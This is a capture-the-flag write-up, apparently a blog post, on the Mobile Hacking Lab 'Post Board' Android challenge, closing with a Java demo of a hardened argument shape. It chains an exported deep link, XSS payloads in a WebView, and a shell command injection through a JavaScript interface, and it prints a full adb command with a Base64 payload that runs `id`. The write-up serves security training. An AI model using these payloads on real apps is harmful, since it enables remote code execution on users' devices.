Post Board
Hello everyone. In this blog post, I will try to explain my solution steps for the Post Board challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.
After we install the APK and open it, we see a message application with an input field.

Let's examine the AndroidManifest.xml. We find the activity `com.mobilehackinglab.postboard.MainActivity`. It is an exported activity whose intent filter data has `scheme=postboard` and `android:host=postmessage`, with the category `BROWSABLE`.
Let's analyze the code of this main activity:
The first thing we find is `setupView()`, which calls `setJavaScriptEnabled(true)` and loads the URL `file:///android_asset/index.html`.
The second thing is `handleIntent()`, which verifies that the intent's URI scheme is `postboard` and the host is `postmessage`. It decodes a Base64-encoded path in the URI, escapes certain characters, and passes it to JavaScript via `WebAppInterface.postMarkdownMessage` to display it on the home page.
Let's test our input:
The first payload is `<h1>kero</h1>` ⇒ success.
The second payload is `<img src=x onerror=alert(1)>` ⇒ success.
When we analyze the `WebAppInterface` class, we find the function `postCowsayMessage()`.

It executes the `cowsay` script located at `CowsayUtil.scriptPath`, passing the message argument as `{"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}`. It uses a shell to run the script path followed by the message.
Maybe we can call `postCowsayMessage` and pass `whoami` as the `cowsayMessage`; it will then be passed to `runCowsay` and executed. My payload is
`<img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")>`
Let's encode it and send it with adb:
adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"
And here we succeed and get RCE 😉
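On the defensive side, the injection depends on the message being concatenated into a string that `/bin/sh -c` parses. The following Java sketch is an added example, not code from the app or from the original post; the class and method names and the stand-in script are assumptions. It runs the same constructed message through both argument shapes on a Unix-like JVM (Java 11+).

```java
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;

public class CowsayArgvDemo {
    // Shape described on this page: the message is concatenated into one string
    // that /bin/sh parses, so ';', '|', '$(...)' in the message are shell syntax.
    static List<String> shellStringArgv(String scriptPath, String message) {
        return List.of("/bin/sh", "-c", scriptPath + ' ' + message);
    }

    // Hardened shape: no "-c". The shell only interprets the script file and the
    // message arrives as a single argv element ($1), never parsed as shell code.
    static List<String> separateArgv(String scriptPath, String message) {
        return List.of("/bin/sh", scriptPath, message);
    }

    // Runs the command and returns its combined stdout/stderr.
    static String run(List<String> argv) throws Exception {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        p.waitFor();
        return out.trim();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for the cowsay script: prints its first argument.
        // It must quote "$1" itself, or the message gets word-split again there.
        Path script = Files.createTempFile("cowsay-demo", ".sh");
        Files.writeString(script, "#!/bin/sh\nprintf 'say: %s\\n' \"$1\"\n");
        script.toFile().setExecutable(true);

        // Constructed input with the same shape as the message used above.
        String message = "Kero0x1_is_here;echo INJECTED";

        System.out.println("[sh -c string] " + run(shellStringArgv(script.toString(), message)));
        System.out.println("[argv element] " + run(separateArgv(script.toString(), message)));
        Files.delete(script);
    }
}
```

Passing the message as its own argv element removes the shell-parsing step; it does not address the exported deep link feeding attacker-controlled HTML into a WebView that exposes `WebAppInterface`.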